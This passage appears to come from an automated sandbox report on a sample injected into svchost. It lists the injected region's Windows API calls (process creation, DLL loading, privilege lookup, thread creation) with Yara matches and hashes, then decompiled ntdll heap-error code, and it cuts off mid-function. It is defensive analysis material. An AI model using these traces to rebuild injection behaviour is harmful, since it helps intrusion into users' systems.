                        • API String ID: 3298025750-1441809116
                        • Opcode ID: a1750e690e6ab0dfa2208fa7330b66514012c64d942669476c76aba097f15414
                        • Instruction ID: c4686b583ff81c97f5b06ed687f05cb4f6667f3207ce074a8fe3ef6d3cb4eeb8
                        • Opcode Fuzzy Hash: a1750e690e6ab0dfa2208fa7330b66514012c64d942669476c76aba097f15414
                        • Instruction Fuzzy Hash: F2E06DB2210308ABCB14EF95CC45E9B33A8AF88310F118545FD185B241C631E801CAB0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 299 239a630-239a661 call 239af20 RtlFreeHeap
                        APIs
                        • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02383AF8), ref: 0239A65D
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.512812495.0000000002380000.00000040.80000000.00040000.00000000.sdmp, Offset: 02380000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_2380000_svchost.jbxd
                        Yara matches
                        Similarity
                        • API ID: FreeHeap
                        • String ID: .z`
                        • API String ID: 3298025750-1441809116
                        • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                        • Instruction ID: ad1556d08047e53db412cb773c8ae65b16fdcbfc05401e38d6e3fd82b1f35aa0
                        • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                        • Instruction Fuzzy Hash: 0CE04FB22003046BDB14DF59DC44EA777ADEF88750F014554FD0957241C630F910CAF0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 302 2388308-238831f 303 2388328-238835a call 239c9c0 call 238ace0 call 2394e40 302->303 304 2388323 call 239be20 302->304 311 238835c-238836e PostThreadMessageW 303->311 312 238838e-2388392 303->312 304->303 313 238838d 311->313 314 2388370-238838b call 238a470 PostThreadMessageW 311->314 313->312 314->313
                        APIs
                        • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0238836A
                        • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0238838B
                        Memory Dump Source
                        • Source File: 00000011.00000002.512812495.0000000002380000.00000040.80000000.00040000.00000000.sdmp, Offset: 02380000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_2380000_svchost.jbxd
                        Yara matches
                        Similarity
                        • API ID: MessagePostThread
                        • String ID:
                        • API String ID: 1836367815-0
                        • Opcode ID: 1fb7f51d22c3ed4b3e4a16b28433f9dfe426715fcb41b7eb9e8942fa834cad60
                        • Instruction ID: f3216b2764f5767822e3aaad01345f0c99695ef6f488a74490776d66323e0605
                        • Opcode Fuzzy Hash: 1fb7f51d22c3ed4b3e4a16b28433f9dfe426715fcb41b7eb9e8942fa834cad60
                        • Instruction Fuzzy Hash: A601B132A802287AEB35A6A49C42FFEAB6D9B41B55F040519FB04FF1C1D6E469064AE1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 317 2388310-238831f 318 2388328-238835a call 239c9c0 call 238ace0 call 2394e40 317->318 319 2388323 call 239be20 317->319 326 238835c-238836e PostThreadMessageW 318->326 327 238838e-2388392 318->327 319->318 328 238838d 326->328 329 2388370-238838b call 238a470 PostThreadMessageW 326->329 328->327 329->328
                        APIs
                        • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0238836A
                        • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0238838B
                        Memory Dump Source
                        • Source File: 00000011.00000002.512812495.0000000002380000.00000040.80000000.00040000.00000000.sdmp, Offset: 02380000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_2380000_svchost.jbxd
                        Yara matches
                        Similarity
                        • API ID: MessagePostThread
                        • String ID:
                        • API String ID: 1836367815-0
                        • Opcode ID: 992dbc98df9335b1755220372970ad0aec5e31f8e74efc97b29a9b00ad940d5b
                        • Instruction ID: e5d2610e97f28035de1b783f3f0005d80aea04c8516569e69a99bbdec62d258b
                        • Opcode Fuzzy Hash: 992dbc98df9335b1755220372970ad0aec5e31f8e74efc97b29a9b00ad940d5b
                        • Instruction Fuzzy Hash: 13018F31A803287BEB20B6949C02FBEB76D6B41F55F040519FF04BA1C1E6A469064AE6
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 332 23882a6-23882ac 333 2388328-238835a call 239c9c0 call 238ace0 call 2394e40 332->333 334 23882ae-23882af 332->334 341 238835c-238836e PostThreadMessageW 333->341 342 238838e-2388392 333->342 334->333 343 238838d 341->343 344 2388370-238838b call 238a470 PostThreadMessageW 341->344 343->342 344->343
                        APIs
                        • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0238836A
                        • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0238838B
                        Memory Dump Source
                        • Source File: 00000011.00000002.512812495.0000000002380000.00000040.80000000.00040000.00000000.sdmp, Offset: 02380000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_2380000_svchost.jbxd
                        Yara matches
                        Similarity
                        • API ID: MessagePostThread
                        • String ID:
                        • API String ID: 1836367815-0
                        • Opcode ID: d5eacfa9f5c46faba9d1e7ceebd69ccdc9f642353195563a4e809e9b8a2a4126
                        • Instruction ID: c94707fc85360904d79615d94672f3a621d17e87aa0a2568be23077f5c30d1e0
                        • Opcode Fuzzy Hash: d5eacfa9f5c46faba9d1e7ceebd69ccdc9f642353195563a4e809e9b8a2a4126
                        • Instruction Fuzzy Hash: 8001A432A803287AEB216A94AC42FFE732CAB41B51F45051AFF04FF5C1D6E469064AE1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 542 238ace0-238ad09 call 239cc10 545 238ad0b-238ad0e 542->545 546 238ad0f-238ad1d call 239d030 542->546 549 238ad2d-238ad3e call 239b460 546->549 550 238ad1f-238ad2a call 239d2b0 546->550 555 238ad40-238ad54 LdrLoadDll 549->555 556 238ad57-238ad5a 549->556 550->549 555->556
                        APIs
                        • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0238AD52
                        Memory Dump Source
                        • Source File: 00000011.00000002.512812495.0000000002380000.00000040.80000000.00040000.00000000.sdmp, Offset: 02380000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_2380000_svchost.jbxd
                        Yara matches
                        Similarity
                        • API ID: Load
                        • String ID:
                        • API String ID: 2234796835-0
                        • Opcode ID: 343ab67df369899ddd45e960eb1e1cf1cc0407856a101373337c9296a528243f
                        • Instruction ID: 8b8af4ac60389528d002b7cb4e456b605890f58b0db229f8ca8a1cd7db28c437
                        • Opcode Fuzzy Hash: 343ab67df369899ddd45e960eb1e1cf1cc0407856a101373337c9296a528243f
                        • Instruction Fuzzy Hash: 3D0121B5E0020DABDF10EBE4DD41FDEB7799B55308F1045A6E9089B240FA71E758CB91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0239A6F4
                        Memory Dump Source
                        • Source File: 00000011.00000002.512812495.0000000002380000.00000040.80000000.00040000.00000000.sdmp, Offset: 02380000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_2380000_svchost.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateInternalProcess
                        • String ID:
                        • API String ID: 2186235152-0
                        • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                        • Instruction ID: 01713c17ef9ca91e796b143b8003efe668a58006398a41fd7325c9c9f7e7f789
                        • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                        • Instruction Fuzzy Hash: 30015FB2214208ABCB54DF89DC80EEB77ADAF8C754F158258BA0D97255D630E851CBA4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,0238F1C2,0238F1C2,?,00000000,?,?), ref: 0239A7C0
                        Memory Dump Source
                        • Source File: 00000011.00000002.512812495.0000000002380000.00000040.80000000.00040000.00000000.sdmp, Offset: 02380000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_2380000_svchost.jbxd
                        Yara matches
                        Similarity
                        • API ID: LookupPrivilegeValue
                        • String ID:
                        • API String ID: 3899507212-0
                        • Opcode ID: 2bf34663b2aad34d0931407289429a6908d770d61b8443b7c270200a0911d235
                        • Instruction ID: 3847056cf63fac45fa7168f2d10acba37801b45a1f95319fd412e78d612277d4
                        • Opcode Fuzzy Hash: 2bf34663b2aad34d0931407289429a6908d770d61b8443b7c270200a0911d235
                        • Instruction Fuzzy Hash: 49F017B6200118AFDB24DFA9DC81EEB77ADEF88254F118259FA0D97241C631E815CBB0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0238F040,?,?,00000000), ref: 023991AC
                        Memory Dump Source
                        • Source File: 00000011.00000002.512812495.0000000002380000.00000040.80000000.00040000.00000000.sdmp, Offset: 02380000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_2380000_svchost.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateThread
                        • String ID:
                        • API String ID: 2422867632-0
                        • Opcode ID: 622e455f62551a298582fe45d05a7a03294a3630e965f56f38a7c3521e18a4e6
                        • Instruction ID: d3af4b8e263cb3dd242427bcd84b0e649fba0f88cc0ff2b6b2492f52f1650b7d
                        • Opcode Fuzzy Hash: 622e455f62551a298582fe45d05a7a03294a3630e965f56f38a7c3521e18a4e6
                        • Instruction Fuzzy Hash: 52E092333803043AE7306599AC02FA7B39DDB92B24F14002AFB0DEB6C0D595F80246E4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,0238F1C2,0238F1C2,?,00000000,?,?), ref: 0239A7C0
                        Memory Dump Source
                        • Source File: 00000011.00000002.512812495.0000000002380000.00000040.80000000.00040000.00000000.sdmp, Offset: 02380000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_2380000_svchost.jbxd
                        Yara matches
                        Similarity
                        • API ID: LookupPrivilegeValue
                        • String ID:
                        • API String ID: 3899507212-0
                        • Opcode ID: 1390492eda279349b5f1356f9c415c2c35538682f1dab37789e8f15b29cb8bc3
                        • Instruction ID: ed2ce47162e21825d340a3eb3f27570357a157cb5bf5d61b13c1e8346da0dbd7
                        • Opcode Fuzzy Hash: 1390492eda279349b5f1356f9c415c2c35538682f1dab37789e8f15b29cb8bc3
                        • Instruction Fuzzy Hash: 87F0A0B22012146FDB11DF85CC41FE73B699F46310F018595F90D57243D532E915C7B1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0238F040,?,?,00000000), ref: 023991AC
                        Memory Dump Source
                        • Source File: 00000011.00000002.512812495.0000000002380000.00000040.80000000.00040000.00000000.sdmp, Offset: 02380000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_2380000_svchost.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateThread
                        • String ID:
                        • API String ID: 2422867632-0
                        • Opcode ID: ab5337d4e631314633f49da3c57175a679bbdc57c35205b8fc6b9e7220d2d3db
                        • Instruction ID: 4f313c45768a5d9fcb82e329403853b94ed687343f7b80d3be1e60d800ecbc0b
                        • Opcode Fuzzy Hash: ab5337d4e631314633f49da3c57175a679bbdc57c35205b8fc6b9e7220d2d3db
                        • Instruction Fuzzy Hash: 42E086777803003AE7306558AC02FF7739D9B92F14F150129FB49EB6C0D5A5F8424AE4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • SetErrorMode.KERNELBASE(00008003,?,02388D14,?), ref: 0238F6EB
                        Memory Dump Source
                        • Source File: 00000011.00000002.512812495.0000000002380000.00000040.80000000.00040000.00000000.sdmp, Offset: 02380000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_2380000_svchost.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorMode
                        • String ID:
                        • API String ID: 2340568224-0
                        • Opcode ID: e641a3ee06fe069aa9b48756013b17a558677eb717b226dbf556287c846394d0
                        • Instruction ID: 3d3c664557f6cb400691125c46cf245dac93502dbcd8b9c2553e57d76af896a8
                        • Opcode Fuzzy Hash: e641a3ee06fe069aa9b48756013b17a558677eb717b226dbf556287c846394d0
                        • Instruction Fuzzy Hash: 49E0C2B2B803002BFA24FAA89C02F663385DB6AA89FAD0538F50DDB3C3DA15C6014524
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,0238F1C2,0238F1C2,?,00000000,?,?), ref: 0239A7C0
                        Memory Dump Source
                        • Source File: 00000011.00000002.512812495.0000000002380000.00000040.80000000.00040000.00000000.sdmp, Offset: 02380000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_2380000_svchost.jbxd
                        Yara matches
                        Similarity
                        • API ID: LookupPrivilegeValue
                        • String ID:
                        • API String ID: 3899507212-0
                        • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                        • Instruction ID: 9a6f48f6545e5e4b874a8796544a80f15348512e72bc82167a7915967a41d71c
                        • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                        • Instruction Fuzzy Hash: 9DE01AB22002086BDB20DF49DC84EE737ADAF89650F018154BE0957241C930E8108BF5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • RtlAllocateHeap.NTDLL(02394526,?,02394C9F,02394C9F,?,02394526,?,?,?,?,?,00000000,00000000,?), ref: 0239A61D
                        Memory Dump Source
                        • Source File: 00000011.00000002.512812495.0000000002380000.00000040.80000000.00040000.00000000.sdmp, Offset: 02380000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_2380000_svchost.jbxd
                        Yara matches
                        Similarity
                        • API ID: AllocateHeap
                        • String ID:
                        • API String ID: 1279760036-0
                        • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                        • Instruction ID: 53063c6a84b4f06c06b4e2fce0da445f02f08938fd968d2e0e0a9942772ffc8e
                        • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                        • Instruction Fuzzy Hash: A7E012B2200208ABDB24EF99DC40EA777ADAF88654F118558BE095B241C630F9108AB0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • SetErrorMode.KERNELBASE(00008003,?,02388D14,?), ref: 0238F6EB
                        Memory Dump Source
                        • Source File: 00000011.00000002.512812495.0000000002380000.00000040.80000000.00040000.00000000.sdmp, Offset: 02380000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_2380000_svchost.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorMode
                        • String ID:
                        • API String ID: 2340568224-0
                        • Opcode ID: a2d4a72b799ecba535e6209a82b178d001bd83fc2549ccaf7422d872a4b8c7e9
                        • Instruction ID: 125c6ad261325fe70edd8f33e7dfa4a23c45d01fb46892054f5d313bbf44c059
                        • Opcode Fuzzy Hash: a2d4a72b799ecba535e6209a82b178d001bd83fc2549ccaf7422d872a4b8c7e9
                        • Instruction Fuzzy Hash: 21D0A7727503043BEA10FAA49C03F2733CD5B45B08F490074FA48DB3C3D954E4014565
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 9e8985a3be734ec70ee4ad07401b19b88cc60a15a726517dd00c4d36c2fdacf2
                        • Instruction ID: cdb79ad2e31fa826ae7d4cb977ba4787c79bca203d8ccb2fece8f0ca1682f61b
                        • Opcode Fuzzy Hash: 9e8985a3be734ec70ee4ad07401b19b88cc60a15a726517dd00c4d36c2fdacf2
                        • Instruction Fuzzy Hash: E9B09B71D035C5C5E651D76047087177A447BD0741F16C051E1020681E4778C091F5B5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Strings
                        • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 030DB484
                        • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 030DB3D6
                        • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 030DB53F
                        • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 030DB38F
                        • *** A stack buffer overrun occurred in %ws:%s, xrefs: 030DB2F3
                        • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 030DB305
                        • *** Resource timeout (%p) in %ws:%s, xrefs: 030DB352
                        • <unknown>, xrefs: 030DB27E, 030DB2D1, 030DB350, 030DB399, 030DB417, 030DB48E
                        • The resource is owned exclusively by thread %p, xrefs: 030DB374
                        • The critical section is owned by thread %p., xrefs: 030DB3B9
                        • write to, xrefs: 030DB4A6
                        • a NULL pointer, xrefs: 030DB4E0
                        • *** Inpage error in %ws:%s, xrefs: 030DB418
                        • an invalid address, %p, xrefs: 030DB4CF
                        • Go determine why that thread has not released the critical section., xrefs: 030DB3C5
                        • This failed because of error %Ix., xrefs: 030DB446
                        • read from, xrefs: 030DB4AD, 030DB4B2
                        • The instruction at %p tried to %s , xrefs: 030DB4B6
                        • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 030DB314
                        • *** enter .exr %p for the exception record, xrefs: 030DB4F1
                        • *** then kb to get the faulting stack, xrefs: 030DB51C
                        • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 030DB2DC
                        • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 030DB476
                        • The instruction at %p referenced memory at %p., xrefs: 030DB432
                        • The resource is owned shared by %d threads, xrefs: 030DB37E
                        • *** enter .cxr %p for the context, xrefs: 030DB50D
                        • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 030DB47D
                        • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 030DB39B
                        • *** An Access Violation occurred in %ws:%s, xrefs: 030DB48F
                        • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 030DB323
                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                        • API String ID: 0-108210295
                        • Opcode ID: 109be01adbc766a1405cdd831eab62c10cb8487b44719fa157410c7fb8d61857
                        • Instruction ID: 7ea76fedc04d0e69e1cd1526311c4eef2be25f575d2a8ddd30b313dd7386c756
                        • Opcode Fuzzy Hash: 109be01adbc766a1405cdd831eab62c10cb8487b44719fa157410c7fb8d61857
                        • Instruction Fuzzy Hash: BA81C179A43310FFCB22EE05DC45EBF7BB6AF87A51F464084F5041F112D2A68561DAB2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 44%
                        			E030E1C06() {
                        				signed int _t27;
                        				char* _t104;
                        				char* _t105;
                        				intOrPtr _t113;
                        				intOrPtr _t115;
                        				intOrPtr _t117;
                        				intOrPtr _t119;
                        				intOrPtr _t120;
                        
                        				_t105 = 0x30048a4;
                        				_t104 = "HEAP: ";
                        				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                        					_push(_t104);
                        					E0302B150();
                        				} else {
                        					E0302B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                        				}
                        				_push( *0x311589c);
                        				E0302B150("Heap error detected at %p (heap handle %p)\n",  *0x31158a0);
                        				_t27 =  *0x3115898; // 0x0
                        				if(_t27 <= 0xf) {
                        					switch( *((intOrPtr*)(_t27 * 4 +  &M030E1E96))) {
                        						case 0:
                        							_t105 = "heap_failure_internal";
                        							goto L21;
                        						case 1:
                        							goto L21;
                        						case 2:
                        							goto L21;
                        						case 3:
                        							goto L21;
                        						case 4:
                        							goto L21;
                        						case 5:
                        							goto L21;
                        						case 6:
                        							goto L21;
                        						case 7:
                        							goto L21;
                        						case 8:
                        							goto L21;
                        						case 9:
                        							goto L21;
                        						case 0xa:
                        							goto L21;
                        						case 0xb:
                        							goto L21;
                        						case 0xc:
                        							goto L21;
                        						case 0xd:
                        							goto L21;
                        						case 0xe:
                        							goto L21;
                        						case 0xf:
                        							goto L21;
                        					}
                        				}
                        				L21:
                        				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                        					_push(_t104);
                        					E0302B150();
                        				} else {
                        					E0302B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                        				}
                        				_push(_t105);
                        				E0302B150("Error code: %d - %s\n",  *0x3115898);
                        				_t113 =  *0x31158a4; // 0x0
                        				if(_t113 != 0) {
                        					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                        						_push(_t104);
                        						E0302B150();
                        					} else {
                        						E0302B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                        					}
                        					E0302B150("Parameter1: %p\n",  *0x31158a4);
                        				}
                        				_t115 =  *0x31158a8; // 0x0
                        				if(_t115 != 0) {
                        					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                        						_push(_t104);
                        						E0302B150();
                        					} else {
                        						E0302B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                        					}
                        					E0302B150("Parameter2: %p\n",  *0x31158a8);
                        				}
                        				_t117 =  *0x31158ac; // 0x0
                        				if(_t117 != 0) {
                        					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                        						_push(_t104);
                        						E0302B150();
                        					} else {
                        						E0302B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                        					}
                        					E0302B150("Parameter3: %p\n",  *0x31158ac);
                        				}
                        				_t119 =  *0x31158b0; // 0x0
                        				if(_t119 != 0) {
                        					L41:
                        					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                        						_push(_t104);
                        						E0302B150();
                        					} else {
                        						E0302B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                        					}
                        					_push( *0x31158b4);
                        					E0302B150("Last known valid blocks: before - %p, after - %p\n",  *0x31158b0);
                        				} else {
                        					_t120 =  *0x31158b4; // 0x0
                        					if(_t120 != 0) {
                        						goto L41;
                        					}
                        				}
                        				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                        					_push(_t104);
                        					E0302B150();
                        				} else {
                        					E0302B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                        				}
                        				return E0302B150("Stack trace available at %p\n", 0x31158c0);
                        			}












                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                        • API String ID: 0-2897834094
                        • Opcode ID: e742093539572c058e710eb3589a833b9d26c0167ff298d49f9aa1417a0a7307
                        • Instruction ID: 01bd5c2e29aaf1d5643ea287b9838338e2fbbaa0bc2a56db919331a29216dd03
                        • Opcode Fuzzy Hash: e742093539572c058e710eb3589a833b9d26c0167ff298d49f9aa1417a0a7307
                        • Instruction Fuzzy Hash: 9F61F936717268DFD219E789D485E6C77E5EB88930B89847EF80A9F341C6709C90CB19
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 72%
                        			E0304A309(signed int __ecx, signed int __edx, signed int _a4, char _a8) {
                        				char _v8;
                        				signed short _v12;
                        				signed short _v16;
                        				signed int _v20;
                        				signed int _v24;
                        				signed short _v28;
                        				signed int _v32;
                        				signed int _v36;
                        				signed int _v40;
                        				signed int _v44;
                        				signed int _v48;
                        				unsigned int _v52;
                        				signed int _v56;
                        				void* _v60;
                        				intOrPtr _v64;
                        				void* _v72;
                        				void* __ebx;
                        				void* __edi;
                        				void* __ebp;
                        				unsigned int _t246;
                        				signed char _t247;
                        				signed short _t249;
                        				unsigned int _t256;
                        				signed int _t262;
                        				signed int _t265;
                        				signed int _t266;
                        				signed int _t267;
                        				intOrPtr _t270;
                        				signed int _t280;
                        				signed int _t286;
                        				signed int _t289;
                        				intOrPtr _t290;
                        				signed int _t291;
                        				signed int _t317;
                        				signed short _t320;
                        				intOrPtr _t327;
                        				signed int _t339;
                        				signed int _t344;
                        				signed int _t347;
                        				intOrPtr _t348;
                        				signed int _t350;
                        				signed int _t352;
                        				signed int _t353;
                        				signed int _t356;
                        				intOrPtr _t357;
                        				intOrPtr _t366;
                        				signed int _t367;
                        				signed int _t370;
                        				intOrPtr _t371;
                        				signed int _t372;
                        				signed int _t394;
                        				signed short _t402;
                        				intOrPtr _t404;
                        				intOrPtr _t415;
                        				signed int _t430;
                        				signed int _t433;
                        				signed int _t437;
                        				signed int _t445;
                        				signed short _t446;
                        				signed short _t449;
                        				signed short _t452;
                        				signed int _t455;
                        				signed int _t460;
                        				signed short* _t468;
                        				signed int _t480;
                        				signed int _t481;
                        				signed int _t483;
                        				intOrPtr _t484;
                        				signed int _t491;
                        				unsigned int _t506;
                        				unsigned int _t508;
                        				signed int _t513;
                        				signed int _t514;
                        				signed int _t521;
                        				signed short* _t533;
                        				signed int _t541;
                        				signed int _t543;
                        				signed int _t546;
                        				unsigned int _t551;
                        				signed int _t553;
                        
                        				_t450 = __ecx;
                        				_t553 = __ecx;
                        				_t539 = __edx;
                        				_v28 = 0;
                        				_v40 = 0;
                        				if(( *(__ecx + 0xcc) ^  *0x3118a68) != 0) {
                        					_push(_a4);
                        					_t513 = __edx;
                        					L11:
                        					_t246 = E0304A830(_t450, _t513);
